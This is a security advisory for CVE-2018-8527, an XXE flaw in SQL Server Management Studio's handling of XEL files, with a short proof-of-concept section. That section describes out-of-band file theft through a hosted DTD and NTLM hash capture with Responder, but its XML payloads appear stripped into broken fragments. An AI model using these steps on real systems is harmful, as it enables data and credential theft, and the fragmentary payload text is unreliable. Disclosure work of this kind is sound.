[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8527 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XEL files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1131/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527 [Exploit/POC] python -m SimpleHTTPServer (listens Port 8000) "evil.xel" (Extended Event Log File) %dtd;]> &send; "payload.dtd" "> %all; OR Steal NTLM hashes Kali linux /usr/share/responder/tools responder -I eth0 -rv "evil.xel" %dtd;]> Result: Forced authentication and NTLM hash captured [Network Access] Remote Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx